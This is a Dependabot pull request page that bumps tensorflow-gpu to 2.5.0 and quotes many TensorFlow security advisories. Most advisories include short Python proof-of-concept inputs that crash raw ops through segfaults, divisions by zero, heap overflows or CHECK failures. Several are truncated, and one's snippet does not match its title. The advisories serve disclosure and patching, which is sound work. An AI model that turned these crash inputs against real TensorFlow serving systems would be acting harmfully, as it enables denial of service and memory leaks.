Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Security] Bump tensorflow-gpu from 1.13.2 to 2.5.0 #638

Open
wants to merge 1 commit into
base: develop
Choose a base branch
from

Conversation

dependabot-preview[bot]
Copy link
Contributor

Bumps tensorflow-gpu from 1.13.2 to 2.5.0. This update includes security fixes.

Vulnerabilities fixed

Sourced from The GitHub Security Advisory Database.

Low severity vulnerability that affects tensorflow, tensorflow-cpu, and tensorflow-gpu

Impact

A heap buffer overflow in UnsortedSegmentSum can be produced when the Index template argument is int32. In this case data_size and num_segments fields are truncated from int64 to int32 and can produce negative numbers, resulting in accessing out of bounds heap memory.

This is unlikely to be exploitable and was detected and fixed internally. We are making the security advisory only to notify users that it is better to update to TensorFlow 1.15 or 2.0 or later as these versions already have this fixed.

Patches

Patched by db4f9717c41bccc3ce10099ab61996b246099892 and released in all official releases after 1.15 and 2.0.

For more information

Please consult SECURITY.md for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 1.15

Sourced from The GitHub Security Advisory Database.

High severity vulnerability that affects tensorflow, tensorflow-cpu, and tensorflow-gpu

Impact

Converting a string (from Python) to a tf.float16 value results in a segmentation fault in eager mode as the format checks for this use case are only in the graph mode.

This issue can lead to denial of service in inference/training where a malicious attacker can send a data point which contains a string instead of a tf.float16 value.

Similar effects can be obtained by manipulating saved models and checkpoints whereby replacing a scalar tf.float16 value with a scalar string will trigger this issue due to automatic conversions.

This can be easily reproduced by tf.constant("hello", tf.float16), if eager execution is enabled.

Patches

We have patched the vulnerability in GitHub commit 5ac1b9.

We are additionally releasing TensorFlow 1.15.1 and 2.0.1 with this vulnerability patched.

TensorFlow 2.1.0 was released after we fixed the issue, thus it is not affected.

We encourage users to switch to TensorFlow 1.15.1, 2.0.1 or 2.1.0.

For more information

... (truncated)

Affected versions: < 1.15.2

Sourced from The GitHub Security Advisory Database.

Segfault in tf.quantization.quantize_and_dequantize

Impact

An attacker can pass an invalid axis value to tf.quantization.quantize_and_dequantize:

tf.quantization.quantize_and_dequantize(
    input=[2.5, 2.5], input_min=[0,0], input_max=[1,1], axis=10)

This results in accessing a dimension outside the rank of the input tensor in the C++ kernel implementation:

const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);

However, dim_size only does a DCHECK to validate the argument and then uses it to access the corresponding element of an array:

int64 TensorShapeBase::dim_size(int d) const {
  DCHECK_GE(d, 0);
  DCHECK_LT(d, dims());
  DoStuffWith(dims_[d]);
}
</tr></table> 

... (truncated)

Affected versions: < 2.4.0

Sourced from The GitHub Security Advisory Database.

Float cast overflow undefined behavior

Impact

When the boxes argument of tf.image.crop_and_resize has a very large value, the CPU kernel implementation receives it as a C++ nan floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault.

Patches

We have patched the issue in c0319231333f0f16e1cc75ec83660b01fedd4182 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported in #42129

Affected versions: < 2.4.0

Sourced from The GitHub Security Advisory Database.

Heap out of bounds access in MakeEdge in TensorFlow

Impact

Under certain cases, loading a saved model can result in accessing uninitialized memory while building the computation graph. The MakeEdge function creates an edge between one output tensor of the src node (given by output_index) and the input slot of the dst node (given by input_index). This is only possible if the types of the tensors on both sides coincide, so the function begins by obtaining the corresponding DataType values and comparing these for equality:

  DataType src_out = src-&gt;output_type(output_index);
  DataType dst_in = dst-&gt;input_type(input_index);
  //...

However, there is no check that the indices point to inside of the arrays they index into. Thus, this can result in accessing data out of bounds of the corresponding heap allocated arrays.

In most scenarios, this can manifest as unitialized data access, but if the index points far away from the boundaries of the arrays this can be used to leak addresses from the library.

Patches

We have patched the issue in GitHub commit 0cc38aaa4064fd9e79101994ce9872c6d91f816b and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Since this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

CHECK-fail in LSTM with zero-length input in TensorFlow

Impact

Running an LSTM/GRU model where the LSTM/GRU layer receives an input with zero-length results in a CHECK failure when using the CUDA backend.

This can result in a query-of-death vulnerability, via denial of service, if users can control the input to the layer.

Patches

We have patched the issue in GitHub commit 14755416e364f17fb1870882fa778c7fec7f16e3 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Since this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Write to immutable memory region in TensorFlow

Impact

The tf.raw_ops.ImmutableConst operation returns a constant tensor created from a memory mapped file which is assumed immutable. However, if the type of the tensor is not an integral type, the operation crashes the Python interpreter as it tries to write to the memory area:

&gt;&gt;&gt; import tensorflow as tf
&gt;&gt;&gt; with open('/tmp/test.txt','w') as f: f.write('a'*128)
&gt;&gt;&gt; tf.raw_ops.ImmutableConst(dtype=tf.string,shape=2,
                              memory_region_name='/tmp/test.txt')

If the file is too small, TensorFlow properly returns an error as the memory area has fewer bytes than what is needed for the tensor it creates. However, as soon as there are enough bytes, the above snippet causes a segmentation fault.

This is because the alocator used to return the buffer data is not marked as returning an opaque handle since the needed virtual method is not overriden.

Patches

We have patched the issue in GitHub commit c1e1fc899ad5f8c725dcbb6470069890b5060bc7 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Since this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.

For more information

... (truncated)

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Lack of validation in data format attributes in TensorFlow

Impact

The tf.raw_ops.DataFormatVecPermute API does not validate the src_format and dst_format attributes. The code assumes that these two arguments define a permutation of NHWC.

However, these assumptions are not checked and this can result in uninitialized memory accesses, read outside of bounds and even crashes.

&gt;&gt;&gt; import tensorflow as tf
&gt;&gt;&gt; tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='1234', dst_format='1234')
...
&gt;&gt;&gt; tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='HHHH', dst_format='WWWW')
...
&gt;&gt;&gt; tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='H', dst_format='W')
&gt;&gt;&gt; tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],
src_format='1234', dst_format='1253')
...
&gt;&gt;&gt; tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],
</tr></table>

... (truncated)

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Uninitialized memory access in TensorFlow

Impact

Under certain cases, a saved model can trigger use of uninitialized values during code execution. This is caused by having tensor buffers be filled with the default value of the type but forgetting to default initialize the quantized floating point types in Eigen:

struct QUInt8 {
  QUInt8() {}
  // ...
  uint8_t value;
};
struct QInt16 {
QInt16() {}
// ...
int16_t value;
};
struct QUInt16 {
QUInt16() {}
// ...
uint16_t value;
</tr></table>

... (truncated)

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Integer truncation in Shard API usage

Impact

The Shard API in TensorFlow expects the last argument to be a function taking two int64 (i.e., long long) arguments: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/util/work_sharder.h#L59-L60

However, there are several places in TensorFlow where a lambda taking int or int32 arguments is being used: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L204-L205 https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L317-L318

In these cases, if the amount of work to be parallelized is large enough, integer truncation occurs. Depending on how the two arguments of the lambda are used, this can result in segfaults, read/write outside of heap allocated arrays, stack overflows, or data corruption.

Patches

We have patched the issue in 27b417360cbd671ef55915e4bb6bb06af8b8a832 and ca8c013b5e97b1373b3bb1c97ea655e69f31a575. We will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in Tensorflow

Impact

The implementation of SparseFillEmptyRowsGrad uses a double indexing pattern: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L263-L269

It is possible for reverse_index_map(i) to be an index outside of bounds of grad_values, thus resulting in a heap buffer overflow.

Patches

We have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Denial of Service in Tensorflow

Impact

The SparseFillEmptyRowsGrad implementation has incomplete validation of the shapes of its arguments: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L235-L241

Although reverse_index_map_t and grad_values_t are accessed in a similar pattern, only reverse_index_map_t is validated to be of proper shape. Hence, malicious users can pass a bad grad_values_t to trigger an assertion failure in vec, causing denial of service in serving installations.

Patches

We have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability is a variant of GHSA-63xm-rx5p-xvqr

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Segfault in Tensorflow

Impact

The tf.raw_ops.Switch operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor.

However, the eager runtime traverses all tensors in the output: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/common_runtime/eager/kernel_and_device.cc#L308-L313

Since only one of the tensors is defined, the other one is nullptr, hence we are binding a reference to nullptr. This is undefined behavior and reported as an error if compiling with -fsanitize=null. In this case, this results in a segmentation fault

Patches

We have patched the issue in da8558533d925694483d2c136a9220d6d49d843c and will release a patch release for all affected versions.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Denial of Service in Tensorflow

Impact

Changing the TensorFlow's SavedModel protocol buffer and altering the name of required keys results in segfaults and data corruption while loading the model. This can cause a denial of service in products using tensorflow-serving or other inference-as-a-service installments.

We have added fixes to this in f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d (both going into TensorFlow 2.2.0 and 2.3.0 but not yet backported to earlier versions). However, this was not enough, as #41097 reports a different failure mode.

Patches

We have patched the issue in adf095206f25471e864a8e63a0f1caef53a0e3a6 and will release patch releases for all versions between 1.15 and 2.3. Patch releases for versions between 1.15 and 2.1 will also contain cherry-picks of f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Shuaike Dong, from Alipay Tian Qian Security Lab && Lab for Applied Security Research, CUHK.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Data leak in Tensorflow

Impact

The data_splits argument of tf.raw_ops.StringNGrams lacks validation. This allows a user to pass values that can cause heap overflow errors and even leak contents of memory

&gt;&gt;&gt; tf.raw_ops.StringNGrams(data=["aa", "bb", "cc", "dd", "ee", "ff"], data_splits=[0,8], separator=" ", ngram_widths=[3], left_pad="", right_pad="", pad_width=0, preserve_short_sequences=False)
StringNGrams(ngrams=
Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Denial of Service in Tensorflow

Impact

By controlling the fill argument of tf.strings.as_string, a malicious attacker is able to trigger a format string vulnerability due to the way the internal format use in a printf call is constructed: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/as_string_op.cc#L68-L74

This can result in unexpected output:

In [1]: tf.strings.as_string(input=[1234], width=6, fill='-')                                                                     
Out[1]:                                               
In [2]: tf.strings.as_string(input=[1234], width=6, fill='+')                                                                     
Out[2]:  
In [3]: tf.strings.as_string(input=[1234], width=6, fill="h")                                                                     
Out[3]:  
In [4]: tf.strings.as_string(input=[1234], width=6, fill="d")                                                                     
Out[4]:  
In [5]: tf.strings.as_string(input=[1234], width=6, fill="o")
Out[5]: 
In [6]: tf.strings.as_string(input=[1234], width=6, fill="x")
Out[6]: 
In [7]: tf.strings.as_string(input=[1234], width=6, fill="g")
Out[7]: 
In [8]: tf.strings.as_string(input=[1234], width=6, fill="a")
</tr></table> 

... (truncated)

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Segfault and data corruption in tensorflow-lite

Impact

To mimic Python's indexing with negative values, TFLite uses ResolveAxis to convert negative values to positive indices. However, the only check that the converted index is now valid is only present in debug builds: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reduce.h#L68-L72

If the DCHECK does not trigger, then code execution moves ahead with a negative index. This, in turn, results in accessing data out of bounds which results in segfaults and/or data corruption.

Patches

We have patched the issue in 2d88f470dea2671b430884260f3626b1fe99830a and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Segfault in Tensorflow

Impact

In eager mode, TensorFlow does not set the session state. Hence, calling tf.raw_ops.GetSessionHandle or tf.raw_ops.GetSessionHandleV2 results in a null pointer dereference: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/session_ops.cc#L45

In the above snippet, in eager mode, ctx-&gt;session_state() returns nullptr. Since code immediately dereferences this, we get a segmentation fault.

Patches

We have patched the issue in 9a133d73ae4b4664d22bd1aa6d654fec13c52ee1 and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Null pointer dereference in tensorflow-lite

Impact

A crafted TFLite model can force a node to have as input a tensor backed by a nullptr buffer. This can be achieved by changing a buffer index in the flatbuffer serialization to convert a read-only tensor to a read-write one. The runtime assumes that these buffers are written to before a possible read, hence they are initialized with nullptr: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L1224-L1227

However, by changing the buffer index for a tensor and implicitly converting that tensor to be a read-write one, as there is nothing in the model that writes to it, we get a null pointer dereference.

Patches

We have patched the issue in 0b5662bc and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360 but was also discovered through variant analysis of GHSA-cvpc-8phh-8f45.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Data corruption in tensorflow-lite

Impact

When determining the common dimension size of two tensors, TFLite uses a DCHECK which is no-op outside of debug compilation modes: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/types.h#L437-L442

Since the function always returns the dimension of the first tensor, malicious attackers can craft cases where this is larger than that of the second tensor. In turn, this would result in reads/writes outside of bounds since the interpreter will wrongly assume that there is enough data in both tensors.

Patches

We have patched the issue in 8ee24e7949a20 and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Null pointer dereference via invalid Ragged Tensors

Impact

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

import tensorflow as tf
input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 2, 6, 2], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 39, 34, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Reference binding to null pointer in MatrixDiag* ops

Impact

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty:

      num_rows = context-&gt;input(2).flat()(0);
      num_cols = context-&gt;input(3).flat()(0);
      padding_value = context-&gt;input(4).flat()(0); 

Thus, users can trigger null pointer dereferences if any of the above tensors are null:

import tensorflow as tf
d = tf.convert_to_tensor([],dtype=tf.float32)
p = tf.convert_to_tensor([],dtype=tf.float32)
tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p)

Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Type confusion during tensor casts lead to dereferencing null pointers

Impact

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences.

There are multiple ways to reproduce this, listing a few examples here:

import tensorflow as tf
import numpy as np
data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64)
import tensorflow as tf
import numpy as np
data =
tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20)
import tensorflow as tf
</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in SparseCross due to type confusion

Impact

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service:

import tensorflow as tf
hashed_output = False
num_buckets = 1949315406
hash_key = 1869835877
out_type = tf.string
internal_type = tf.string
indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64)
indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.constant([0], dtype=tf.int64)
values_2 = tf.constant([72], dtype=tf.int64)
values = [values_1, values_2]
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Session operations in eager mode lead to null pointer dereferences

Impact

In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference:

import tensorflow as tf
tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4)
import tensorflow as tf
tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])

The implementation dereferences the session state pointer without checking if it is valid:

  OP_REQUIRES_OK(ctx, ctx-&gt;session_state()-&gt;GetTensor(name, &amp;val));

Thus, in eager mode, ctx-&gt;session_state() is nullptr and the call of the member function is undefined behavior.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by zero in Conv3D

Impact

A malicious user could trigger a division by 0 in Conv3D implementation:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

The implementation does a modulo operation based on user controlled input:

  const int64 out_depth = filter.dim_size(4);
  OP_REQUIRES(context, in_depth % filter_depth == 0, ...);

Thus, when filter has a 0 as the fifth element, this results in a division by 0.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow caused by rounding

Impact

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements:

import tensorflow as tf
l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384]
images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32)
size = tf.constant([12, 6], shape=[2], dtype=tf.int32)
min = tf.constant(80.22522735595703)
max = tf.constant(80.39215850830078)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max,
align_corners=True, half_pixel_centers=True)

This is because the implementation computes two integers (representing the upper and lower bounds for interpolation) by ceiling and flooring a floating point value:

const float in_f = std::floor(in);
</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in Conv3DBackprop*

Impact

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows:

import tensorflow as tf
input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32)
out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 89, 29, 89, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

import tensorflow as tf
input_values = [-10.0] * (7 * 7 * 7 * 7 * 7)
input_values[0] = 429.6491056791816
input_sizes = tf.constant(input_values, shape=[7, 7, 7, 7, 7], dtype=tf.float32)
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedConv2D

Impact

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D:

import tensorflow as tf
input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8)
filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8)
min_input = tf.constant(0.0)
max_input = tf.constant(0.0001)
min_filter = tf.constant(0.0)
max_filter = tf.constant(0.0001)
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.QuantizedConv2D(input=input, filter=filter, min_input=min_input, max_input=max_input, min_filter=min_filter, max_filter=max_filter, strides=strides, padding=padding)

This is because the implementation does a division by a quantity that is controlled by the caller:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv2D

Impact

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D:

import tensorflow as tf
input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

This is because the implementation does a division by a quantity that is controlled by the caller:

  const int64 patch_depth = filter.dim_size(2);
  if (in_depth % patch_depth != 0) { ... }

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv2DBackpropInput

Impact

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput:

import tensorflow as tf
input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor,
out_backprop=out_backprop, strides=[1, 1, 1, 1],
use_cudnn_on_gpu=True, padding='SAME',
explicit_paddings=[], data_format='NHWC',
dilations=[1, 1, 1, 1])

This is because the implementation does a division by a quantity that is controlled by the caller:

</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv2DBackpropFilter

Impact

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 18, 1], use_cudnn_on_gpu=True,
padding='SAME', explicit_paddings=[],
data_format='NHWC', dilations=[1, 1, 1, 1])

This is because the implementation does a modulus operation where the divisor is controlled by the caller:

</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in AddManySparseToTensorsMap

Impact

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap:

import tensorflow as tf
import numpy as np
sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64)
sparse_values = tf.ones([1], dtype=tf.int64)
shape = tf.Variable(tf.ones([55], dtype=tf.int64))
shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64))
tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices,
sparse_values=sparse_values,
sparse_shape=shape)

This is because the implementation takes the values specified in sparse_shape as dimensions for the output shape:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv3DBackprop*

Impact

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0:

import tensorflow as tf
input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

import tensorflow as tf
input_sizes = tf.constant([1], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
filter_tensor = tf.constant([0, 0, 0, 1, 0], shape=[5], dtype=tf.int32)
out_backprop = tf.constant([], shape=[1, 1, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedMul

Impact

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul:

import tensorflow as tf
x = tf.zeros([4, 1], dtype=tf.quint8)
y = tf.constant([], dtype=tf.quint8)
min_x = tf.constant(0.0)
max_x = tf.constant(0.0010000000474974513)
min_y = tf.constant(0.0)
max_y = tf.constant(0.0010000000474974513)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

This is because the implementation does a division by a quantity that is controlled by the caller:

template 
</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in tf.raw_ops.EncodePng

Impact

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data:

import tensorflow as tf
image = tf.zeros([0, 0, 3])
image = tf.cast(image, dtype=tf.uint8)
tf.raw_ops.EncodePng(image=image)

